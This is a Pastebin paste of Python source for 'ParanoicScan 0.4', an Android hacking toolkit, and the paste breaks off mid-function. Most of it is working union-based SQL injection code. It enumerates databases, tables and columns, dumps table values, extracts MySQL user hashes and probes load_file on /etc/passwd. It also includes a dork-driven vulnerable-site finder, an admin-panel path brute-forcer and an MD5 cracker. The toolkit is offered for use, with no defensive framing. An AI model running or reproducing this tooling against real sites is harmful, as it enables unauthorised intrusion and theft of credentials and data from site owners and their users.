Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!usr/bin/python
- import android,urllib2,socket,binascii,re,base64,hashlib
- webvul = ""
- # Functions
- def hexencoder(texto):
- return "[+] Result : "+"0x"+str(binascii.hexlify(texto))
- def hexdecoder(texto):
- text = re.sub("0x","",texto)
- return "[+] Result : "+binascii.unhexlify(text)
- def base64encoder(texto):
- return "[+] Result : "+base64.b64encode(texto)
- def base64decoder(texto):
- return "[+] Result : "+base64.b64decode(texto)
- def md5encoder(texto):
- return "[+] Result : "+hashlib.md5(texto).hexdigest()
- def reem(texto,parte):
- return re.sub(parte,"hackman",texto)
- def regexver(code):
- if (re.findall("K0BRA(.*?)K0BRA",code)):
- return True
- else:
- return False
- def regexdar(code):
- if (re.findall("K0BRA(.*?)K0BRA",code)):
- return re.findall("K0BRA(.*?)K0BRA",code)[0]
- def toma(web) :
- nave = urllib2.Request(web)
- nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
- op = urllib2.build_opener()
- return op.open(nave).read()
- def tomar(web,vars) :
- nave = urllib2.build_opener()
- nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
- return nave.open(web,vars).read()
- def getdata(web) :
- nave = urllib2.Request(web)
- nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
- op = urllib2.build_opener()
- return op.open(nave).info()
- def bypass(bypass):
- if bypass == "--":
- return("+","--")
- elif bypass == "/*":
- return("/**/","/**/")
- else:
- return("+","--")
- def showtables(web):
- pass1,pass2 = bypass("--")
- respuesta = ""
- web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
- web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
- code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
- respuesta = respuesta + "[+] Searching tables ...\n\n"
- if (re.findall("K0BRA(.*?)K0BRA",code1)):
- numbers = re.findall("K0BRA(.*?)K0BRA",code1)
- numbers = numbers[0]
- respuesta = respuesta + "[+] Tables Found : "+numbers+"\n\n"
- for counter in range(17,int(numbers)):
- code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
- if (re.findall("K0BRA(.*?)K0BRA",code2)):
- table = re.findall("K0BRA(.*?)K0BRA",code2)
- table = table[0]
- respuesta = respuesta + "[Table Found] : "+table+"\n"
- else:
- respuesta = respuesta + "[-] Not Found\n"
- respuesta = respuesta + "\n[+] Finished"
- return respuesta
- def showcolumns(web,tabla):
- respuesta = ""
- pass1,pass2 = bypass("--")
- tabla2 = tabla
- tabla = "0x"+str(binascii.hexlify(tabla))
- web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
- web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
- code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
- respuesta = respuesta + "[+] Searching columns ...\n\n"
- if (re.findall("K0BRA(.*?)K0BRA",code1)):
- numbers = re.findall("K0BRA(.*?)K0BRA",code1)
- numbers = numbers[0]
- respuesta = respuesta + "[+] Columns Found : "+numbers+"\n"
- for counter in range(0,int(numbers)):
- code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
- if (re.findall("K0BRA(.*?)K0BRA",code2)):
- column = re.findall("K0BRA(.*?)K0BRA",code2)
- column = column[0]
- respuesta = respuesta + "\n[Column Found in table "+str(tabla2)+"] : "+str(column)
- else:
- respuesta = respuesta + "[-] Not Found"
- respuesta = respuesta + "\n\n[+] Finished"
- return respuesta
- def showdbs(web):
- respuesta = ""
- pass1,pass2 = bypass("--")
- web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
- web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
- code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
- respuesta = respuesta + "[+] Searching DBS ...\n\n"
- if (re.findall("K0BRA(.*?)K0BRA",code1)):
- numbers = re.findall("K0BRA(.*?)K0BRA",code1)
- numbers = numbers[0]
- respuesta = respuesta + "[+] DBS Found : "+numbers+"\n"
- for counter in range(0,int(numbers)):
- code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
- if (re.findall("K0BRA(.*?)K0BRA",code2)):
- db = re.findall("K0BRA(.*?)K0BRA",code2)
- db = db[0]
- respuesta = respuesta + "\n[DB Found] : "+db
- else:
- respuesta = respuesta + "[-] Not Found"
- respuesta = respuesta + "\n\n[+] Finished"
- return respuesta
- def dumper(web,table,col1,col2):
- respuesta = ""
- pass1,pass2 = bypass("--")
- web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
- web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
- code1 = toma(web1+pass1+"from"+pass1+table+pass2)
- respuesta = respuesta + "[+] Searching values ...\n\n"
- if (re.findall("K0BRA(.*?)K0BRA",code1)):
- numbers = re.findall("K0BRA(.*?)K0BRA",code1)
- numbers = numbers[0]
- respuesta = respuesta + "[+] Values Found : "+numbers+"\n"
- for counter in range(0,int(numbers)):
- code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
- if (re.findall("K0BRA(.*?)K0BRA",code2)):
- c1 = re.findall("K0BRA(.*?)K0BRA",code2)
- c1 = c1[0]
- c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
- c2 = c2[0]
- respuesta = respuesta + "\n["+col1+"] : "+c1+"\n"
- respuesta = respuesta + "["+col2+"] : "+c2+"\n"
- else:
- respuesta = respuesta + "[-] Not Found\n"
- respuesta = respuesta + "\n[+] Finished"
- return respuesta
- def mysqluser(web):
- pass1,pass2 = bypass("--")
- respuesta = ""
- web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
- web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
- code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
- respuesta = respuesta + "[+] Searching mysql.user ...\n\n"
- if (re.findall("K0BRA(.*?)K0BRA",code1)):
- numbers = re.findall("K0BRA(.*?)K0BRA",code1)
- numbers = numbers[0]
- respuesta = respuesta + "[+] Users Found : "+numbers+"\n"
- for counter in range(0,int(numbers)):
- code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
- if (re.findall("K0BRA(.*?)K0BRA",code2)):
- host = re.findall("K0BRA(.*?)K0BRA",code2)
- host = host[0]
- user = re.findall("K0BRA1(.*?)K0BRA1",code2)
- user = user[0]
- passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
- passw = passw[0]
- respuesta = respuesta + "\n[Host] : "+host
- respuesta = respuesta + "\n[User] : "+user
- respuesta = respuesta + "\n[Pass] : "+passw+"\n"
- else:
- respuesta = respuesta + "[-] Not Found\n"
- respuesta = respuesta + "\n[+] Finished"
- return respuesta
- def showcolumnsdb(web,db,table):
- respuesta = ""
- db2 = db
- table2 = table
- db = "0x"+str(binascii.hexlify(db))
- table = "0x"+str(binascii.hexlify(table))
- pass1,pass2 = bypass("--")
- web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
- web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
- code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
- respuesta = respuesta + "[+] Searching columns in DB ...\n"
- if (re.findall("K0BRA(.*?)K0BRA",code1)):
- numbers = re.findall("K0BRA(.*?)K0BRA",code1)
- numbers = numbers[0]
- respuesta = respuesta + "\n[+] Columns Found : "+str(numbers)+"\n"
- for counter in range(0,int(numbers)):
- code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
- if (re.findall("K0BRA(.*?)K0BRA",code2)):
- column = re.findall("K0BRA(.*?)K0BRA",code2)
- column = column[0]
- respuesta = respuesta + "\n[Column Found] : "+str(column)
- else:
- respuesta = respuesta + "\n[-] Not Found"
- respuesta = respuesta + "\n\n[+] Finished"
- return respuesta
- def showtablesdb(web,db):
- respuesta = ""
- db2 = db
- db = "0x"+str(binascii.hexlify(db))
- pass1,pass2 = bypass("--")
- web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
- web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
- code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
- respuesta = respuesta + "[+] Searching tables in DB ...\n\n"
- if (re.findall("K0BRA(.*?)K0BRA",code1)):
- numbers = re.findall("K0BRA(.*?)K0BRA",code1)
- numbers = numbers[0]
- respuesta = respuesta + "[+] Tables Found : "+str(numbers)+"\n"
- for counter in range(0,int(numbers)):
- code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
- if (re.findall("K0BRA(.*?)K0BRA",code2)):
- table = re.findall("K0BRA(.*?)K0BRA",code2)
- table = table[0]
- respuesta = respuesta + "\n[Table Found] : "+table
- else:
- respuesta = respuesta + "[-] Not Found"
- respuesta = respuesta + "\n\n[+] Finished"
- return respuesta
- def more(web):
- respuesta = ""
- pass1,pass2 = bypass("--")
- otraweb = web
- respuesta = respuesta + "[+] Searching DB Details ...\n"
- hextest = "0x2f6574632f706173737764"
- web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
- web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
- code0 = toma(web1+pass2)
- if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
- datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
- datar = re.split("K0BRA",datax[0])
- respuesta = respuesta + "\n[+] Username : "+datar[1]
- respuesta = respuesta + "\n[+] Database : "+datar[2]
- respuesta = respuesta + "\n[+] Version : "+datar[3]+"\n"
- code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
- if (re.findall("K0BRA",code1)):
- respuesta = respuesta + "\n[+] mysql.user : on"
- code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
- if (re.findall("K0BRA",code2)):
- respuesta = respuesta + "\n[+] information_schema.tables : on"
- codetres = toma(web2)
- if (re.findall("ERTOR854",codetres)):
- respuesta = respuesta + "\n[+] load_file() : on"
- respuesta = respuesta + "\n\n[+] Finished"
- return respuesta
- def httpfinger(target):
- respuesta = ""
- try:
- respuesta = respuesta + str(getdata(target))
- except:
- respuesta = respuesta + "[-] Error"
- return respuesta
- def scanpanel(web):
- contador = 0
- panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
- respuesta = ""
- respuesta = respuesta + "[+] Scanning ...\n"
- for path in panels:
- try:
- toma(web+"/"+path)
- respuesta = respuesta + "\n[+] Link : "+web+"/"+path
- contador = contador + 1
- except urllib2.URLError, e:
- pass
- if(contador==0) :
- respuesta = respuesta + "\n[+] Not Found"
- respuesta = respuesta + "\n\n[+] Finished"
- return respuesta
- def crackmd5(md5) :
- respuesta = ""
- code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
- if (re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)):
- rex = re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)
- return "[+] Hash : "+rex[0][1]
- else:
- code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
- if (re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)):
- rex = re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)
- return "[+] Hash : "+rex[0]
- else:
- code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
- if (re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)):
- rex = re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)
- return "[+] Hash : "+rex[0]
- else:
- return "[+] Hash : Not Found"
- return respuesta
- def locateip(pagina):
- respuesta = ""
- ip = socket.gethostbyname(str(pagina))
- code = tomar("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=","ipaddress="+ip+"&Submit=submit")
- respuesta = respuesta + "[++] IP Address Location\n"
- if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
- rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
- city = rex[0][1]
- respuesta = respuesta + "\n[++] City : "+city
- else:
- respuesta = respuesta + "\n[++] City : Not Found"
- if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
- rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
- country = rex[0][1]
- respuesta = respuesta + "\n[++] Country : "+country
- else:
- respuesta = respuesta + "\n[++] Country : Not Found"
- if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
- rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
- state = rex[0][1]
- respuesta = respuesta + "\n[++] State : "+state
- else:
- respuesta = respuesta + "\n[++] State : Not Found"
- code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
- if (re.findall("whois\/(.*?)\">Whois",code)):
- rex = re.findall("whois\/(.*?)\">Whois",code)
- respuesta = respuesta + "\n\n[++] DNS Founds\n"
- for dns in rex:
- if not dns == "":
- respuesta = respuesta + "\n[+] "+dns
- return respuesta
- def sqltest(webs):
- respuesta = ""
- for web in webs :
- if re.findall("=",web):
- web = re.split("=",web)
- web = web[0]+"="
- try:
- code = toma(web+"-1+union+select+1--")
- if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
- respuesta = respuesta + "[SQLI] : "+web+"\n"
- except:
- pass
- return respuesta
- def limpiar(pag):
- limpia = []
- for p in pag:
- if p not in limpia:
- limpia.append(p)
- return limpia
- def bingscan(dork,count):
- respuesta = ""
- pag = []
- s = 10
- while s <= int(count):
- try:
- code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
- d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
- e = re.findall("<h2><a href=\"(.*?)\"",code,re.I)
- s += 10
- for a in d:
- pag.append(a)
- for b in e:
- pag.append(b)
- except:
- pass
- pag = limpiar(pag)
- return pag
- ##
- aplicacion = android.Android()
- def menuencoder():
- aplicacion.dialogCreateAlert("Encoders")
- aplicacion.dialogSetItems(["MD5 Encoder","Base64 Encoder","Base64 Decoder","Hex Encoder","Hex Decoder","Exit"])
- aplicacion.dialogShow()
- reh = aplicacion.dialogGetResponse().result
- reb = reh["item"]
- if reb==0:
- aplicacion.dialogCreateAlert("MD5 Encoder")
- aplicacion.dialogGetInput("MD5 Encoder","Enter Text")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menuencoder()
- else:
- texto = ref['value']
- aplicacion.dialogCreateSpinnerProgress("MD5 Encoder","[+] Encoding ...")
- aplicacion.dialogShow()
- don = md5encoder(texto)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("MD5 Encoder",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menuencoder()
- if reb==1 :
- aplicacion.dialogCreateAlert("Base64 Encoder")
- aplicacion.dialogGetInput("Base64 Encoder","Enter Text")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menuencoder()
- else:
- texto = ref['value']
- aplicacion.dialogCreateSpinnerProgress("Base64 Encoder","[+] Encoding ...")
- aplicacion.dialogShow()
- don = base64encoder(texto)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("Base64 Encoder",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menuencoder()
- if reb==2 :
- aplicacion.dialogCreateAlert("Base64 Decoder")
- aplicacion.dialogGetInput("Base64 Decoder","Enter Text")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menuencoder()
- else:
- texto = ref['value']
- aplicacion.dialogCreateSpinnerProgress("Base64 Decoder","[+] Encoding ...")
- aplicacion.dialogShow()
- don = base64decoder(texto)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("Base64 Decoder",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menuencoder()
- if reb==3 :
- aplicacion.dialogCreateAlert("Hex Encoder")
- aplicacion.dialogGetInput("Hex Encoder","Enter Text")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menuencoder()
- else:
- texto = ref['value']
- aplicacion.dialogCreateSpinnerProgress("Hex Encoder","[+] Encoding ...")
- aplicacion.dialogShow()
- don = hexencoder(texto)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("Hex Encoder",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menuencoder()
- if reb==4 :
- aplicacion.dialogCreateAlert("Hex Decoder")
- aplicacion.dialogGetInput("Hex Decoder","Enter Text")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menuencoder()
- else:
- texto = ref['value']
- aplicacion.dialogCreateSpinnerProgress("Hex Decoder","[+] Encoding ...")
- aplicacion.dialogShow()
- don = hexdecoder(texto)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("Hex Decoder",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menuencoder()
- if reb==5:
- menu()
- def menusql():
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogSetItems(["Get Tables","Get Columns","Get Databases","Get Tables of DB","Get Columns of DB","Get mysql.users","Get Details DB","Dump Values","Exit"])
- aplicacion.dialogShow()
- reez = aplicacion.dialogGetResponse().result
- opsql = reez["item"]
- if opsql==0:
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables ...")
- aplicacion.dialogShow()
- don = showtables(webvul)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menusql()
- if opsql==1 :
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menusql()
- else:
- tabla = ref['value']
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns ...")
- aplicacion.dialogShow()
- don = showcolumns(webvul,tabla)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menusql()
- if opsql==2 :
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Databases ...")
- aplicacion.dialogShow()
- don = showdbs(webvul)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menusql()
- if opsql==3 :
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menusql()
- else:
- db = ref['value']
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables of DB ...")
- aplicacion.dialogShow()
- don = showtablesdb(webvul,db)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menusql()
- if opsql==4 :
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menusql()
- else:
- db = ref['value']
- aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menusql()
- else:
- tabla = ref['value']
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns of DB ...")
- aplicacion.dialogShow()
- don = showcolumnsdb(webvul,db,tabla)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menusql()
- if opsql==5 :
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching mysql.users ...")
- aplicacion.dialogShow()
- don = mysqluser(webvul)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menusql()
- if opsql==6 :
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Information ...")
- aplicacion.dialogShow()
- don = more(webvul)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menusql()
- if opsql==7 :
- aplicacion.dialogCreateAlert("SQLI Scanner")
- aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menusql()
- else:
- tabla = ref['value']
- aplicacion.dialogGetInput("SQLI Scanner","Enter Column1")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menusql()
- else:
- columna1 = ref['value']
- aplicacion.dialogGetInput("SQLI Scanner","Enter Column2")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menusql()
- else:
- columna2 = ref['value']
- aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Values ...")
- aplicacion.dialogShow()
- don = dumper(webvul,tabla,columna1,columna2)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("SQLI Scanner",don)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menusql()
- if opsql==8:
- menu()
- def menu():
- aplicacion.dialogCreateAlert("ParanoicScan 0.4 (C) Doddy Hackman 2015")
- aplicacion.dialogSetItems(["BingHackTool","SQLI Scanner","MD5 Cracker","Admin Finder","Locate IP","HTTP FingerPrinting","Encoders","About","Exit"])
- aplicacion.dialogShow()
- re = aplicacion.dialogGetResponse().result
- re2 = re["item"]
- if re2==0:
- aplicacion.dialogCreateAlert("BingHack Tool")
- aplicacion.dialogGetInput("BingHack Tool","Enter Dork")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menu()
- else:
- dork = ref['value']
- aplicacion.dialogGetInput("BingHack Tool","Enter number of pages to search")
- ref = aplicacion.dialogGetResponse().result
- if not ref['which'] == 'positive' :
- menu()
- else:
- paginas = ref['value']
- paginas = str(paginas)
- aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Searching ...")
- aplicacion.dialogShow()
- founds = ""
- rez = ""
- rtafinal = ""
- founds = bingscan(dork,paginas)
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Scanning ...")
- aplicacion.dialogShow()
- rez = sqltest(founds)
- if len(rez) == 0 :
- rtafinal = "[-] Not Found"
- else :
- rtafinal = "[++] Pages Founds\n\n"
- rtafinal = rtafinal + rez
- rtafinal = rtafinal + "\n[++] Finished\n"
- aplicacion.dialogDismiss()
- aplicacion.dialogCreateAlert("BingHack Tool",rtafinal)
- aplicacion.dialogSetPositiveButtonText("Done")
- aplicacion.dialogShow()
- op = aplicacion.dialogGetResponse().result
- if op["which"] == "positive" :
- menu()
- if re2==1 :
- global webvul
